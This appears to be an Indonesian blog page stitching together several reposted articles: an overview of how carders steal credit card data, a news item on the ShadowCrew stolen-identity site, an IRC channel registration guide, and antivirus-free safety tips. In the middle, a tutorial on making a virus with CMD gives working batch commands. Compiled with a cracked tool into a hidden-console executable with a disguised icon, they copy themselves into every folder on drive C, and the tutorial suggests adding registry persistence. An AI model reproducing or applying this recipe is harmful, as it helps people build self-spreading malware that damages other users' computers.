15 Okt 2010

Cara Hacker mencuri data Kartu Kredit

by erwin13 on Fri Dec 02, 2005 1:31 pm
Artikel ini tidak ditujukan untuk mengajari anda gimana mencuri data kartu kredit, tapi kami ingin memberitahu anda supaya di kemudian hari anda bisa terhindari dari kejahatan pencurian data kartu kredit. Istilah kejahatan kartu kredit yang biasa di istilahkan “carding” sejak adanya internet meningkat ratusan persen. Ironisnya Indonesia masuk dalam jajaran top 10 (sempat di peringkat pertama) sehingga kartu kredit terbitan Bank-Bank Indonesia ditolak ketika belanja online di situs luar negeri.
Hal ini juga pernah di alami oleh penulis yang ingin berlangganan majalah game luar negeri dengan pembayaran online lewat kartu kredit.
Para hacker sangat suka sekali kejahatan yang satu ini, kenapa? Karena kalau cuma nge-hack website atau deface (merubah tampilan/link website) merupakan sesuatu yang tidak ada untungnya. Dan hal ini bisa ke deteksi dan pelaku kejahatan bisa ketangkap dengan mudah kalau sites yang dia masuki memiliki TRACKER (program pelacak ip/link) atau LOG FILE (file yang mencatat aktivitas user/ip yang masuk ke website). Kalau carding mereka bisa bebas tanpa jejak dan juga kadang-kadang setelah mendapatkan datanya, mereka sebarkan antar hacker sehingga susah dilacak orang pertama yang mencuri data kartu kredit. Kejadian baru-baru ini yaitu situs internet teroris Indonesia juga di register dari hasil carding.
Ada beberapa cara yang digunakan oleh hacker dalam mencuri kartu kredit, antara lain:
1. Paket sniffer, cara ini adalah cara yang paling cepat untuk mendapatkan data apa saja. Konsep kerjanya mereka cukup memakai program yang dapat melihat atau membuat logging file dari data yang dikirim oleh website e-commerce (penjualan online) yang mereka incar. Pada umumnya mereka mengincar website yang tidak dilengkapi security encryption atau situs yang tidak memiliki security yang bagus.
2. Membuat program spyware, trojan, worm dan sejenisnya yang berfungsi seperti keylogger (keyboard logger, program mencatat aktifitas keyboard) dan program ini disebar lewat E-mail Spamming (taruh file-nya di attachment), mirc (chatting), messenger (yahoo, MSN), atau situs-situs tertentu dengan icon atau iming-iming yang menarik netter untuk mendownload dan membuka file tersebut. Program ini akan mencatat semua aktivitas komputer anda ke dalam sebuah file, dan akan mengirimnya ke email hacker. Kadang-kadang program ini dapat dijalankan langsung kalau anda masuk ke situs yang di buat hacker atau situs porno.
3. Membuat situs phising, yaitu situs sejenis atau kelihatan sama seperti situs aslinya. contoh di Indonesia ketika itu situs klik bca (http://www.klikbca.com), pernah mengalami hal yang sama. situs tersebut tampilannya sama seperti klikbca tetapi alamatnya dibikin beberapa yang berbeda seperti http://www.clikbca.com, http://www.kikbca.com, dll, jadi kalau netter yang salah ketik, akan nyasar ke situs tersebut. Untungnya orang yang membuat situs tersebut katanya tidak bermaksud jahat. Nah kalau hacker carding yang buat tuh situs, siap-siap deh kartu kredit anda bakal jebol.
4. Menjebol situs e-commerce itu langsung dan mencuri semua data para pelanggannya. Cara ini agak sulit dan perlu pakar hacker atau hacker yang sudah pengalaman untuk melakukannya. Pada umumnya mereka memakai metode injection (memasukan script yang dapat dijalankan oleh situs/server) bagi situs yang memiliki firewall. Ada beberapa cara injection antara lain yang umum digunakan html injection dan SQL injection. Bagi situs yang tidak memiliki security atau firewall, siap-siaplah dikerjain abis-abisan.
Ada beberapa cara lagi yang dilakukan para hacker, tapi cara-cara di atas adalah cara yang paling umum dilakukan hacker untuk carding. Cara yang tidak umum akan dijelaskan nanti di lain waktu. Kejahatan tidak hanya terjadi karena ada niat dari si pelaku, tetapi karena adanya kesempatan, waspadalah… waspadalah…
penulis: erwin@ketok.com (http://www.ketok.com)
nb: di lain kesempatan penulis akan menulis cara mencegah hal tersebut di atas.
Last edited by erwin13 on Fri Dec 02, 2005 1:37 pm, edited 1 time in total.
erwin13
User
Posts: 33
Joined: Fri Dec 02, 2005 11:45 am
Top
by erwin13 on Fri Dec 02, 2005 1:32 pm
http://www.shadowcrew.com, situs pusat penjualan identitas curian (sumber: detikinet)
Dua belas orang dinyatakan bersalah karena mendalangi situs pencuri identitas terbesar. Sepak terjang situs ini menimbulkan kerugian sedikitnya US$ 4 juta, atau sekitar Rp 40 miliar.
Pihak penyidik dari Associated Press mengatakan, situs http://www.shadowcrew.com adalah situs pusat penjualan identitas curian terbesar. Situs ini juga menyediakan data kartu kredit, yang tentu saja diperoleh dengan cara dicuri.
Jaksa Federal mengatakan, situs ini memiliki 4.000 anggota. Ada sekitar 1,5 juta nomor kartu kredit curian yang diperdagangkan. Kerugian yang ditimbulkan diperkirakan US$4 juta lebih.
“Kerugian itu berdampak pada bank-bank yang mengeluarkan kartu kredit dan MasterCard, Visa, American Express, yang harus menutupi hutang yang terpaksa ditanggung oleh mereka yang jadi korban dalam kejahatan ini,” kata Kevin O’Dowd, Asistan Pengacara Amerika Serikat.
Untuk mendapatkan informasi kartu kredit, situs ini memakai teknik seperti phishing dan spamming. Bisa ditebak seperti apa motif penipuan yang dilancarkan. Yakni dengan berkedok sebagai e-mail yang sekilas berasal dari bank atau lembaga keuangan resmi. Nomor kartu kredit yang didapat lalu dipakai untuk belanja di internet. Tidak disebutkan berapa apa hukuman bagi para pelaku.

Bikin Virus dengan perintah CMD

Bagi yang tidak bisa bahasa pemrograman ada satu cara yang gampang dan sangat mudah untuk membuat semacam virus.
Yang perlu dipersiapkan:
1. Software Quick Batch File Compiler (quickbfc.exe)
2. License key atau crack dari quickbfc
3. Pengetahuan akan perintah cmd
4. Software Icon Changer
quickbfc adalah software dari www.abyssmedia.com yang mana software ini bisa digunakan untuk mengcompile (atau apa aja deh namanya) perintah2 cmd menjadi file exe.
Salah satu keistimewaan quickbfc ini adalah kemampuannya untuk menjadikan file exe yang dibuat ketika di run tidak akan menampilkan jendela console. Fitur ini bisa diset dengan memilih project=>option=>ghost application. Hanya saja yang bisa menggunakan fitur ini hanyalah full version (atau bisa juga di crack).
Icon Changer (IC) diperlukan untuk mencari icon seperti icon kepunyaan windows.
IC dapat didownload di http://www.shelllabs.com.
Setelah membuka IC, search icon di folder windows\system32 , disitu akan ada banyak icon yang menarik, seperti icon folder, icon text,dll. Setelah ketemu icon yg diinginkan simpan icon tersebut.
Sekarang kita bahas masalah perintah cmdnya. Salah satu ciri virus yaitu kemampuan menggandakan diri. Seperti kita ketahui jika kita membuat bat file dg isinya “ copy %0 c:\ “ maka akan berakibat file bat tadi dicopikan ke c:\. Tapi ketika kita menggunakan perintah yg sama di quickbfc maka hasilnya tidak seperti itu, dalam artian file exe yang dihasilkan ketika di run tidak akan di copi ke drive c:\. Untuk menyiasati hal ini kita bisa menggunakan cara lain yaitu dengan perintah “for %%a in (*.exe) do if %%~za equ 12345 copy %%a c:\arira.exe “ .
Perintah ini berarti “ untuk setiap file exe dalam direktori ini jika file berukuran 12345 bytes maka copikan file (yg berukuran 12345 bytes tadi ) ke c:\ dg nama arira.exe “. 12345 adalah ukuran file virus hasil kompile dari quickbfc (misalnya) . Permasalahan yg ada adalah jika ada file exe yg ukurannya sama dan berada pada folder yg sama dengan file virus kita.
Ok,selanjutnya buat perintah lainnya.
Kita buat agar kalau virus kita di run akan membuka my documents. Perintahnya “ explorer %userprofile% “.
Terusss, perintah yang ini bisa sedikit menjengkelkan for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d” ,perintah ini berarti “untuk setiap folder, subfolder di drive c copikan file c:\arira.exe di folder kalian dengan nama cinta.exe”. maka setelah perintah ini selesai dieksekusi semua folder dan subfolder di c:\ akan memiliki file cinta.exe.
Dan seterusnya….dan seterusnya pikirkan sendiri perintahnya…..misalkan bikin value di regedit biar si virus bisa hidup lagi setelah computer restart,dll.
Contoh: perintah cmd yang sudah kita buat
REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 12345 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d”
REM ini adalah akhir dari skrip
Sebelum dikompile pilih custom resources untuk menset icon dari file yang akan dihasilkan. Kompile skript diatas, kemudian lihat ukuran file exe yang dihasilkan. Misalkan ukuran file yang dihasilkan adalah 82571, maka ganti skript diatas sehingga menjadi
REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 82571 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d”
REM ini adalah akhir dari skrip
Kompile ulang, lihat ukuran file yang dihasilkan. Jika ukurannya 82571 bytes maka sudah benar. Jika belum, ulangi sampai angka pada skript sama dengan ukuran file yang dihasilkan.
Keterangan:
Pada contoh perintah diatas “for %%a in (*.exe) do if %%~za equ 82571 copy %%a c:\arira.exe “ tidak bisa digunakan untuk cmd (hanya bisa untuk skript), kalau pingin menggunakan perintah ini dalam cmd makan ganti %%a dengan %a sehingga perintahnya akan menjadi “ for %a in (*.exe) do if %~za equ 82571 copy %a c:\arira.exe “
Terima Kasih kepada tomPLIX see

Bikin Channel di DalNet

Beberapa minggu yang lalu ada temen boy yang minta diajarin bikin sebuah channel di IRC, trus beberapa hari kemudian ada temen lagi yg minta dibuatin channel tapi karena dari sononya boy n’tu males jadi sekalian tak bikinin tutornya (walau agak beratakan). Menurutku istilah “buat channel” itu sedikit kurang pas karna pada dasarnya kita hanya daftarkan channel kosong alias gak ada yang punya, tapi daripada n’tar boy dikeroyok pembaca ya… no problem lah..
Persiapan:
1. Koneksi internet
2. software irc (saya pake mIRC)
3. email yang masih aktif
4. Kopi dan cemilan
5. Temen yang enak di ajak chating
Tapi sebelum kita ngebuat channel kita daftarkan dulu nick yang akan kita pakai karena klo gak terdaftar, kau tak kan bisa buat channel (cuma bisa chating doang). Hi we go!!
1. Masuk ke salah satu penyedia jasa chating klo disini kita pake dalnet
2. Daftarkan nick yang kau pake,
Ketik: /nickserv register (password) (email)
Contoh: /nickserv register 123 Fery.Boy21@gmail.com
3. Setelah mendaftar sebenarnya kau dapat langsung menggunakannya, tapi ini hanya bersifat sementara, karena itu sekarang kita masuk ke email yang kau daftarkan, disitu kau akan menerima email dari dalnet
4. Ikuti petunjuknya maka kau akan secara resmi terdaftar di server dalnet.
5. Sip! Sekarang kau telah terdaftar, untuk mencobanya kita login
Ketik: /nickserv identify (password)
Contoh: /nickserv identify 123
Setelah login kini kau dapat membuat sebuah channel caranya,
1. Buka sebuah channel yang kau inginkan, jika channel tersebut belum ada yang punya maka secara otomatis kau akan menjadi operator channel tersebut tandanya di depan nick ada karakter ‘@’ tapi untuk mengetahui lebih lanjut gunakan perintah berikut.
Ketik: /chanserv info (channel)
Contoh: /chanserv info #BFC
2. Jika channel tersebut belum ada yang punya maka kau dapat mendaftarkannya dengan cara
Ketik: /chanserv register (channel) (password channel) (deskripsi)
Contoh: /chanserv register #BFC passwdku “perkumpulan fans bokep”
3. Selesai..!! sekarang kau sudah menjadi owner (pemilik) channel #BFC (he..3x)
Untuk mengatur channel, kau dapat masuk ke konfigurasi dasar channel, caranya double klik pada tampilan channel milikmu. Disitu kau dapat mengubah salam pembuka channel (Topic History), IP

TIPS AMAN DARI SERANGAN VIRUS TANPA ANTIVIRUS

“Hiks, komputerku kena virus. Kok bisa yach, padahal aku sudah menginstal Antivirus terbaru..”
Kira-kira seperti itulah perkataan teman-teman Spyro yang pernah minta bantuan Spyro untuk menyelamatkan data-data mereka dari serangan Virus. Banyak orang awam (hehehe… padahal saya juga orang awam) berkeyakinan bahwa dengan menginstal Antivirus terbaru maka komputer mereka akan aman dari serangan Virus. Anggapan ini jelas tidak dapat dibenarkan karena percuma saja kita memiliki Antivirus Versi terbaru tetapi tidak pernah diupdate. Antivirus yang rajin diupdate pun belum tentu aman karena setiap harinya ada puluhan atau bahkan ratusan virus baru maupun variannya yang tercipta dan Antivirus dengan Virus Definition terbaru belum tentu dapat mendeteksinya.
Hal terpenting yang harus kita miliki sebenarnya bukan Antivirus yang super. Namun yang harus ada adalah “kemampuan” dan “pengetahuan” karena kedua unsur itulah yang akan menjadi “Antivirus Paling Super”. Fahami bagaimana virus bekerja, fahami sistem dan kamu akan tau bagaimana cara membasmi mereka. Jangan tunggu sampai terinfeksi, sedini mungkin berusahalah untuk melakukan pencegahan. Antivirus mungkin masih dibutuhkan untuk mencegah masuknya virus-virus lama, namun sekali lagi hal yang terpenting adalah “kemampuan” dan “pengetahuan”. Berikut ini tips-trik sederhana pencegahan seranagn virus yang mungkin bermanfaat untuk anda:
1. Waspadai file-file asing
- Pastikan bahwa antara ekstensi file dan logo icon file yang ditampilkan sesuai. Beberapa virus meniru icon msword dan icon file-file gambar untuk mengelabuhi user. Bahkan ada yang meniru icon Folder seperti virus w32/kumis.A misalnya.
- Jangan membuka file-file asing yang tidak kamu ketahui secara jelas asal usulnya dan dampak bagi komputermu.
- Jangan membuka folder yang dirasa asing. Pastikan apakah folder asing itu benar-benar folder ataukah file .exe yang memakai icon folder.
- Hati-hati terhadap file-file .vbs dan .bat yang terenkripsi. Sebelum menjalankannya sebaiknya decrypt dulu codenya (baca artikel “Tehnik Enkripsi Virus VBS” di artikel terdahulu).
- Waspada terhadap file-file web seperti html, htm, php, asp dll… Seelum kamu membuka file-file tersebut yang kamu dapat dari Internet, terlebih dahulu bukalah file-file tersebut dengan menggunakan notepad. Setelah dirasa aman dari script asing, barulah buka dengan browser.
2. Periksa dan lindungi file-file system.
File-file .ini dan Autoexec.bat adalah sasaran empuk bagi virus. Kamu bisa melindungi file-file tersebut dari perubahan dengan menggunakan aplikasi pengaman komputer seperti FileVault (bisa kamu dapatkan di halaman Untility). Filevault disamping mengamankan data-data pentingmu juga akan mengamankan file-file system.
3. Disket
Dari hasil penelitian ternyata virus-virus yang paling meluas penyebarannya adalah virus yang mampu menyebarkan dirinya melalui disket. Hal ini terjadi dikarenakan pada umumnya pengguna komputer di Indonesia masih menggunakan disket sebagai alat penyimpanan data sementara. Jangan lansung membuka disket dengan menggunakan Windows explorer!! Masuklah ke A:\ melalui DOS terlebih dahulu kemudian hapuslah file Folder.htt (biasanya beratribut Hidden). Mengapa harus menghapus folder.htt?? Karena file folder.htt kerapkali menjadi sasaran virus untuk menyisipkan kode jahatnya. Why?? Karena file ini akan otomatis tereksekusi saat kamu membuka suatu folder atau drive.
4. Internet
- Jika kamu browsing di rumah, usahakan untuk tidak menggunakan Internet Explorer. IE sangat lemah dan rentan terhadap serangan virus/worm. Gunakan browser lain yang lebih handal misalnya Mozilla Firefox.
- Waspadalah terhadap screensaver gratisan yang banyak bertebaran di Internet (Baca artikel “Amankah Mendownload Screensaver dari Internet??”) dan program-program crack karena kebanyakan aplikasi tersebut disisipi trojan oleh pembuatnya.
- Jangan browsing ke sitis-situs PORNO. Disamping karena Dosa (Zina Mata) kebanyakan situs-situs porno menyisipkan trojan berbahaya yang akan mencuri informasi-informasi dari komputermu. Tapi jika kamu nekat juga “pengen” browsing ke situs-situs “ahli Neraka” tersebut, instal lah DeepFreeze terlebih dahulu dan aktifkan Frozen mode.
- Jangan menggunakan MS Outlook karena kamu tentunya sudah tau sendiri betapa lemahnya MSOUTLOOK. Gunakan EudoraMail.
5. Task Manager, MsCONFIG, StartUp, Registry
- Komputer sering hang?? Periksalah Taskmanager (ctrl+alt+del) dan lihatlah aplikasi apa saja yang sedang berjalan, siapa tau ada “utusan” Virus disana. Jika ada aplikas asing, lansung ajah EndTask.
- Periksa juga MsConfig (start – Run ketik msconfig) pada tab startup. Hilangkan centang pada aplikasi yang tidak penting. Jika ada aplikasi yanga asing, segera hilangkan centang di kotak sebelahnya lalu masuklah ke registry (start – Run ketik regedit) dan hapus valuenya (baca artikel tentang registry di tutorial-tutorial sebelumnya).
- Direktory startup (start-programs-startup) juga harus sering-sering diperiksa karena semua file yang ada di direktory ini akan otomatis dijalankan saat windows startup. Jika ada file asing di directory ini, segera hapus!!
6. Trust NOBODY!!
Jangan percaya pada siapapun!!! Jangan pernah memberikan akses setingkat dengan Administrator pada orang lain. Ingat!! Bisa saja orang lain tersebut menyisipkan aplikasi jahat di komputermu entah dengan alasan bercanda atau alasan lainnya.
Bagaimana?? Keenam langkah diatas cukup merepotkan bukan?? Jika kamu tidak mau repot maka hanya satu solusinya “Jangan Pernah Membuka File-File ASING yang Tidak Kamu Ketahu Secara Jelas Asal-Usulnya. Titik!!”

sumber: spyro_zone@Yahoo.COM ==> www.spyrozone.net